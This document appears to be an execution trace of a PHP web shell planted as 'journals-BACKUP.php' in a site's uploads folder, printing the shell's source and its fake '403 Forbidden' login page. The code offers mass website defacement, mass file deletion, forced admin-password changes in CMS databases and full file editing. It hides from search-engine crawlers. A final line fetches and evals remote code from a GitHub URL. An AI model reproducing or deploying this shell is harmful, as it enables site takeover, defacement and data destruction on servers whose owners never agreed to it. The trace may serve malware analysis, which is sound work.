BY id_identitas ASC");\n\t\t\t\t\t\t\t$result = mysql_fetch_array($q);\n\t\t\t\t\t\t\t$target = $result[alamat_website];\n\t\t\t\t\t\t\tif($target == \'\') {\n\t\t\t\t\t\t\t\t$target2 = $result[url];\n\t\t\t\t\t\t\t\t$url_target = "Login => ".color(1, 1, "Cant\'t get domain name")."<br>";\n\t\t\t\t\t\t\t\tif($target2 == \'\') {\n\t\t\t\t\t\t\t\t\t$url_target2 = "Login => ".color(1, 1, "Cant\'t get domain name")."<br>";\n\t\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t\t$cek_login3 = file_get_contents("$target2/adminweb/");\n\t\t\t\t\t\t\t\t\t$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");\n\t\t\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {\n\t\t\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/adminweb\' target=\'_blank\'><u>$target2/adminweb</u></a><br>";\n\t\t\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\t\t\telseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {\n\t\t\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/lokomedia/adminweb\' target=\'_blank\'><u>$target2/lokomedia/adminweb</u></a><br>";\n\t\t\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2\' target=\'_blank\'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t$cek_login = file_get_contents("$target/adminweb/");\n\t\t\t\t\t\t\t\t$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");\n\t\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {\n\t\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/adminweb\' target=\'_blank\'><u>$target/adminweb</u></a><br>";\n\t\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\t\telseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {\n\t\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/lokomedia/adminweb\' target=\'_blank\'><u>$target/lokomedia/adminweb</u></a><br>";\n\t\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE level=\'admin\'");\n\t\t\t\t\t\t\tprint "Config => ".$file_conf."<br>";\n\t\t\t\t\t\t\tprint "CMS => Lokomedia<br>";\n\t\t\t\t\t\t\tif(preg_match("/Can\'t get domain name/", $url_target)) {\n\t\t\t\t\t\t\t\tprint $url_target2;\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint $url_target;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif(!$update OR !$conn OR !$db) {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 1, mysql_error())."<br><br>";\n\t\t\t\t\t\t\t} \n\t\t\t\t\t\t\telse {\n\t\t\t\t\t\t\t\tprint "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tmysql_close($conn);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} \n\t\t\telse {\n\t\t\t\tprint "<center>\n\t\t\t\t<h1>Mass Password Change</h1>\n\t\t\t\t<form method=\'post\'>\n\t\t\t\t<input type=\'radio\' name=\'config_type\' value=\'dir\' checked>DIR Config<input type=\'radio\' name=\'config_type\' value=\'link\'>LINK Config<br>\n\t\t\t\t<input type=\'text\' size=\'50\' name=\'config_dir\' value=\'".path()."\'><br><br>\n\t\t\t\tSet User & Pass: <br>\n\t\t\t\t<input type=\'text\' name=\'user_baru\' value=\'lanang404x\' placeholder=\'user_baru\'><br>\n\t\t\t\t<input type=\'text\' name=\'pass_baru\' value=\'awesa123\' placeholder=\'pass_baru\'><br>\n\t\t\t\t<input style=\'background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;\' type=\'submit\' name=\'hajar\' value=\'Hajar!\'>\n\t\t\t\t</form></center>";\n\t\t\t}\n\t\t}\n\t\telseif($_GET[\'do\'] === "mass") {\n\t\t\tif($_POST[\'start\']) {\n\t\t\t\tif($_POST[\'mass_type\'] === \'singledir\') {\n\t\t\t\t\tprint "<div style=\'margin: 5px auto; padding: 5px\'>";\n\t\t\t\t\tmassdeface($_POST[\'d_dir\'], $_POST[\'script\'], $_POST[\'d_file\']);\n\t\t\t\t\tprint "</div>";\n\t\t\t\t} \n\t\t\t\telseif($_POST[\'mass_type\'] === \'alldir\') {\n\t\t\t\t\tprint "<div style=\'margin: 5px auto; padding: 5px\'>";\n\t\t\t\t\tmassdeface($_POST[\'d_dir\'], $_POST[\'script\'], $_POST[\'d_file\'], "-alldir");\n\t\t\t\t\tprint "</div>";\n\t\t\t\t}\n\t\t\t\telseif($_POST[\'mass_type\'] === "delete") {\n\t\t\t\t\tprint "<div style=\'margin: 5px auto; padding: 5px\'>";\n\t\t\t\t\tmassdelete($_POST[\'d_dir\'], $_POST[\'d_file\']);\n\t\t\t\t\tprint "</div>";\n\t\t\t\t}\n\t\t\t} \n\t\t\telse {\n\t\t\t\tprint "<center><form method=\'post\'>\n\t\t\t\t\t <font style=\'text-decoration: underline;\'>Tipe Sabun:</font><br>\n\t\t\t\t\t <input type=\'radio\' name=\'mass_type\' value=\'singledir\' checked>Mass Deface Single Directory<input type=\'radio\' name=\'mass_type\' value=\'alldir\'>Mass Deface All Directory<input type=\'radio\' name=\'mass_type\' value=\'delete\'>Mass Delete File<br>\n\t\t\t\t\t <span>( kosongkan \'Index File\' jika memilih Mass Delete File )</span><br><br>\n\t\t\t\t\t <font style=\'text-decoration: underline;\'>Folder:</font><br>\n\t\t\t\t\t <input type=\'text\' name=\'d_dir\' value=\'".path()."\' style=\'width: 450px;\' height=\'10\'><br><br>\n\t\t\t\t\t <font style=\'text-decoration: underline;\'>Filename:</font><br>\n\t\t\t\t\t <input type=\'text\' name=\'d_file\' value=\'index.php\' style=\'width: 450px;\' height=\'10\'><br><br>\n\t\t\t\t\t <font style=\'text-decoration: underline;\'>Index File:</font><br>\n\t\t\t\t\t <textarea name=\'script\' style=\'width: 450px; height: 200px;\'>Hacked by L4N4N9_4K1R4</textarea><br>\n\t\t\t\t\t <input style=\'background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;\' type=\'submit\' name=\'start\' value=\'Mass\'>\n\t\t\t\t\t </form></center>";\n\t\t\t}\n\t\t}\n\t\telseif($_GET[\'do\'] == \'fakeroot\') {\n\t\t\tob_start();\n\n\t\t\t$site = explode("\\r\\n", $_POST[\'url\']);\n\t\t\t$user = usergroup()->name;\n\t\t\t$file = $_POST[\'file\'];\n\n\t\t\tif(!preg_match("#/home/$user/public_html#", $_SERVER[\'DOCUMENT_ROOT\'])) die(color(1, 1, "Failed Mas :("));\n\t\t\t\n\t\t\t\n\t\t\tif($_POST[\'reverse\']) {\n\t\t\t\tif(!is_writable($_SERVER[\'DOCUMENT_ROOT\'])) die(color(1, 1, "Directory \'".$_SERVER[\'DOCUMENT_ROOT\']."\' is not writeable."));\n\t\t\t\tif(!is_writable(dirname($_SERVER[\'DOCUMENT_ROOT\']))) die(color(1, 1, "Directory \'".dirname($_SERVER[\'DOCUMENT_ROOT\'])."\' is not writeable."));\n\n\t\t\t\tsave($_SERVER[\'DOCUMENT_ROOT\']."/".$file, "w", $_POST[\'script\']);\n\t\t\t\tsave(dirname($_SERVER[\'DOCUMENT_ROOT\'])."/".$file, "w", $_POST[\'script\']);\n\n\t\t\t\tforeach($site as $url) {\n\t\t\t\t\t$cek = curl("$url/~$user/$file")[\'response\'];\n\t\t\t\t\tif(preg_match("/hacked/i", $cek)) {\n\t\t\t\t\t\tprint "URL: <a href=\'$url/~$user/$file\' target=\'_blank\'>$url/~$user/$file</a> -> <font color=aqua>Fake Root!</font><br>";\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tprint "<center><form method=\'post\'>\n\t\t\t\tFilename: <br><input type=\'text\' name=\'file\' value=\'deface.html\' size=\'50\' height=\'10\'><br>\n\t\t\t\tUser: <br><input type=\'text\' value=\'$user\' size=\'50\' height=\'10\' readonly><br>\n\t\t\t\tDomain: <br>\n\t\t\t\t<textarea style=\'width: 450px; height: 250px;\' name=\'url\'>";\n\t\t\t\tprint implode("\\n", reverse());\n\t\t\t\tprint "</textarea><br>\n\t\t\t\t<font style=\'text-decoration: underline;\'>Index File:</font><br>\n\t\t\t\t<textarea name=\'script\' style=\'width: 450px; height: 200px;\'>Hacked By L4N4N9_4K1R4</textarea><br>\n\t\t\t\t<input style=\'background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;\' type=\'submit\' name=\'reverse\' value=\'Scan Fake Root!\'>\n\t\t\t\t</form><br>\n\t\t\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";\n\t\t\t}\n\t\t} \n\t}\n\telseif(isset($_GET[\'act\'])) {\n\t\tif($_GET[\'act\'] === \'newfile\') {\n\t\t\tif($_POST[\'save\']) {\n\t\t\t\t$filename = htmlspecialchars($_POST[\'filename\']);\n\t\t\t\t$fopen = fopen($filename, "a+");\n\t\t\t\tif($fopen) {\n\t\t\t\t\t$act = "<script>window.location=\'?act=edit&dir=".path()."&file=".$_POST[\'filename\']."\';</script>";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint $act;\n\t\t\tprint "<form method=\'post\'>\n\t\t\tFilename: <input type=\'text\' name=\'filename\' value=\'".path()."/newfile.php\' style=\'width: 450px;\' height=\'10\'>\n\t\t\t<input type=\'submit\' class=\'input\' name=\'save\' value=\'SUBMIT\'>\n\t\t\t</form>";\n\t\t} \n\t\telseif($_GET[\'act\'] === \'newfolder\') {\n\t\t\tif($_POST[\'save\']) {\n\t\t\t\t$foldername = path().\'/\'.htmlspecialchars($_POST[\'foldername\']);\n\t\t\t\tif(!@mkdir($foldername)) {\n\t\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = "<script>window.location=\'?dir=".path()."\';</script>";\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint $act;\n\t\t\tprint "<form method=\'post\'>\n\t\t\tFolder Name: <input type=\'text\' name=\'foldername\' style=\'width: 450px;\' height=\'10\'>\n\t\t\t<input type=\'submit\' class=\'input\' name=\'save\' value=\'SUBMIT\'>\n\t\t\t</form>";\n\t\t} \n\t\telseif($_GET[\'act\'] === \'rename_folder\') {\n\t\t\tif($_POST[\'save\']) {\n\t\t\t\t$rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST[\'foldername\']));\n\t\t\t\tif($rename_folder) {\n\t\t\t\t\t$act = "<script>window.location=\'?dir=".dirname(path())."\';</script>";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t\t}\n\t\t\tprint "$act<br>";\n\t\t\t}\n\t\t\tprint "<form method=\'post\'>\n\t\t\t<input type=\'text\' value=\'".basename(path())."\' name=\'foldername\' style=\'width: 450px;\' height=\'10\'>\n\t\t\t<input type=\'submit\' class=\'input\' name=\'save\' value=\'RENAME\'>\n\t\t\t</form>";\n\t\t} \n\t\telseif($_GET[\'act\'] === \'delete_folder\') {\n\t\t\tif(is_dir(path())) {\n\t\t\t\tif(is_writable(path())) {\n\t\t\t\t\t@rmdir(path());\n\t\t\t\t\tif(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());\n\t\t\t\t\tif(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());\n\t\t\t\t\t$act = "<script>window.location=\'?dir=".dirname(path())."\';</script>";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Could not remove directory \'".basename(path())."\'");\n\t\t\t\t}\n\t\t\t}\n\t\t\tprint $act;\n\t\t} \n\t\telseif($_GET[\'act\'] === \'view\') {\n\t\t\tprint "Filename: ".color(1, 2, basename($_GET[\'file\']))." [".writeable($_GET[\'file\'], perms($_GET[\'file\']))."]<br>";\n\t\t\tprint "[ <a href=\'?act=view&dir=".path()."&file=".$_GET[\'file\']."\'><b>view</b></a> ] [ <a href=\'?act=edit&dir=".path()."&file=".$_GET[\'file\']."\'>edit</a> ] [ <a href=\'?act=rename&dir=".path()."&file=".$_GET[\'file\']."\'>rename</a> ] [ <a href=\'?act=download&dir=".path()."&file=".$_GET[\'file\']."\'>download</a> ] [ <a href=\'?act=delete&dir=".path()."&file=".$_GET[\'file\']."\'>delete</a> ]<br>";\n\t\t\tprint "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET[\'file\']))."</textarea>";\n\t\t} \n\t\telseif($_GET[\'act\'] === \'edit\') {\n\t\t\tif($_POST[\'save\']) {\n\t\t\t\t$save = file_put_contents($_GET[\'file\'], $_POST[\'src\']);\n\t\t\t\tif($save) {\n\t\t\t\t\t$act = color(1, 2, "File Saved!");\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t\t}\n\t\t\t\tprint "$act<br>";\n\t\t\t}\n\n\t\t\tprint "Filename: ".color(1, 2, basename($_GET[\'file\']))." [".writeable($_GET[\'file\'], perms($_GET[\'file\']))."]<br>";\n\t\t\tprint "[ <a href=\'?act=view&dir=".path()."&file=".$_GET[\'file\']."\'>view</a> ] [ <a href=\'?act=edit&dir=".path()."&file=".$_GET[\'file\']."\'><b>edit</b></a> ] [ <a href=\'?act=rename&dir=".path()."&file=".$_GET[\'file\']."\'>rename</a> ] [ <a href=\'?act=download&dir=".path()."&file=".$_GET[\'file\']."\'>download</a> ] [ <a href=\'?act=delete&dir=".path()."&file=".$_GET[\'file\']."\'>delete</a> ]<br>";\n\t\t\tprint "<form method=\'post\'>\n\t\t\t<textarea name=\'src\'>".htmlspecialchars(@file_get_contents($_GET[\'file\']))."</textarea><br>\n\t\t\t<input type=\'submit\' class=\'input\' value=\'SAVE\' name=\'save\' style=\'width: 500px;\'>\n\t\t\t</form>";\n\t\t} \n\t\telseif($_GET[\'act\'] === \'rename\') {\n\t\t\tif($_POST[\'save\']) {\n\t\t\t\t$rename = rename($_GET[\'file\'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST[\'filename\']));\n\t\t\t\tif($rename) {\n\t\t\t\t\t$act = "<script>window.location=\'?dir=".path()."\';</script>";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t\t}\n\t\t\t\tprint "$act<br>";\n\t\t\t}\n\n\t\t\tprint "Filename: ".color(1, 2, basename($_GET[\'file\']))." [".writeable($_GET[\'file\'], perms($_GET[\'file\']))."]<br>";\n\t\t\tprint "[ <a href=\'?act=view&dir=".path()."&file=".$_GET[\'file\']."\'>view</a> ] [ <a href=\'?act=edit&dir=".path()."&file=".$_GET[\'file\']."\'>edit</a> ] [ <a href=\'?act=rename&dir=".path()."&file=".$_GET[\'file\']."\'><b>rename</b></a> ] [ <a href=\'?act=download&dir=".path()."&file=".$_GET[\'file\']."\'>download</a> ] [ <a href=\'?act=delete&dir=".path()."&file=".$_GET[\'file\']."\'>delete</a> ]<br>";\n\t\t\tprint "<form method=\'post\'>\n\t\t\t<input type=\'text\' value=\'".basename($_GET[\'file\'])."\' name=\'filename\' style=\'width: 450px;\' height=\'10\'>\n\t\t\t<input type=\'submit\' class=\'input\' name=\'save\' value=\'RENAME\'>\n\t\t\t</form>";\n\t\t}\n\t\telseif($_GET[\'act\'] === \'delete\') {\n\t\t\t$delete = unlink($_GET[\'file\']);\n\t\t\tif($delete) {\n\t\t\t\t$act = "<script>window.location=\'?dir=".path()."\';</script>";\n\t\t\t} \n\t\t\telse {\n\t\t\t\t$act = color(1, 1, "Permission Denied!");\n\t\t\t}\n\t\t\tprint $act;\n\t\t}\n\t}\n\telse {\n\t\tfiles_and_folder();\n\t}\n}\n\nserverinfo();\naction();\n?>\n</body>\n</html>\n' /var/www/html/uploads/journals-BACKUP.php 1 0
3 6 0 0.060043 1079568 session_start 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 2 0
3 6 1 0.060157 1080320
3 6 R TRUE
3 7 0 0.060177 1080320 error_reporting 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 3 1 0
3 7 1 0.060196 1080360
3 7 R 22527
3 8 0 0.060211 1080320 set_time_limit 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 4 1 0
3 8 1 0.060231 1080384
3 8 R FALSE
3 9 0 0.060245 1080352 clearstatcache 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 5 0
3 9 1 0.060260 1080352
3 9 R NULL
3 10 0 0.060274 1080352 ini_set 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 6 2 'error_log' NULL
3 10 1 0.060292 1080424
3 10 R ''
3 11 0 0.060306 1080352 ini_set 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 7 2 'log_errors' 0
3 11 1 0.060322 1080424
3 11 R '1'
3 12 0 0.060336 1080352 ini_set 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 8 2 'max_execution_time' 0
3 12 1 0.060351 1080392
3 12 R '0'
3 13 0 0.060364 1080320 ini_set 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 9 2 'output_buffering' 0
3 13 1 0.060381 1080392
3 13 R FALSE
3 14 0 0.060394 1080320 ini_set 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 10 2 'display_errors' 0
3 14 1 0.060409 1080392
3 14 R ''
2 A /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 12 $password = 'e460c73bf40f1437a34b8963bb572dee'
2 A /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 14 $SERVERIP = '127.0.0.1'
3 15 0 0.060457 1080320 path 1 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 15 0
4 16 0 0.060471 1080320 getcwd 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 218 0
4 16 1 0.060488 1080368
4 16 R '/var/www/html/uploads'
4 17 0 0.060504 1080368 str_replace 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 218 3 '\\' '/' '/var/www/html/uploads'
4 17 1 0.060521 1080464
4 17 R '/var/www/html/uploads'
3 A /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 218 $dir = '/var/www/html/uploads'
3 15 1 0.060549 1080368
3 15 R '/var/www/html/uploads'
3 18 0 0.060567 1080368 str_replace 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 15 3 '/var/www/html' '' '/var/www/html/uploads'
3 18 1 0.060583 1080504
3 18 R '/uploads'
2 A /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 15 $FILEPATH = '/uploads'
2 A /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 18 $userAgents = [0 => 'Googlebot', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'PycURL', 4 => 'facebookexternalhit', 5 => 'ia_archiver', 6 => 'crawler', 7 => 'Yandex', 8 => 'Rambler', 9 => 'Yahoo! Slurp', 10 => 'YahooSeeker', 11 => 'bingbot', 12 => 'curl']
3 19 0 0.060637 1080360 implode 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 19 2 '|' [0 => 'Googlebot', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'PycURL', 4 => 'facebookexternalhit', 5 => 'ia_archiver', 6 => 'crawler', 7 => 'Yandex', 8 => 'Rambler', 9 => 'Yahoo! Slurp', 10 => 'YahooSeeker', 11 => 'bingbot', 12 => 'curl']
3 19 1 0.060665 1080584
3 19 R 'Googlebot|Slurp|MSNBot|PycURL|facebookexternalhit|ia_archiver|crawler|Yandex|Rambler|Yahoo! Slurp|YahooSeeker|bingbot|curl'
3 20 0 0.060686 1080520 preg_match 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 19 2 '/Googlebot|Slurp|MSNBot|PycURL|facebookexternalhit|ia_archiver|crawler|Yandex|Rambler|Yahoo! Slurp|YahooSeeker|bingbot|curl/i' 'python-requests/2.25.1'
3 20 1 0.060711 1080584
3 20 R 0
3 21 0 0.060725 1080360 md5 0 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 70 1 'localhost'
3 21 1 0.060741 1080456
3 21 R '421aa90e079fa326b6494f812ad13e79'
3 22 0 0.060758 1080360 login_shell 1 /var/www/html/uploads/journals-BACKUP.php(1) : eval()'d code 74 0
0.060813 1000896
TRACE END [2023-02-13 01:49:30.620936]
<html><head>
<meta name="robots" content="noindex. nofollow">
<title>403 Forbidden</title>
<style type="text/css">
html {
margin: 20px auto;
background: #000000;
color: green;
text-align: center;
}
header {
color: green;
margin: 10px auto;
}
input[type=password] {
width: 250px;
height: 25px;
color: red;
background: transparent;
border: 1px dotted green;
margin-left: 20px;
text-align: center;
}
</style>
</head>
<body><center>
<header>
<pre> ___________________________
< root@lanang404x:~# w00t??? >
---------------------------
<img src="https://i.imgur.com/u4jDGJH.png" width="350px" align="center">
</pre>
</header>
<form method="post">
<input type="password" name="password">
</form>
</center></body></html>
<?=eval("?>".file_get_contents("https://raw.githubusercontent.com/LanangAkira/OniChan/main/log.txt"));?>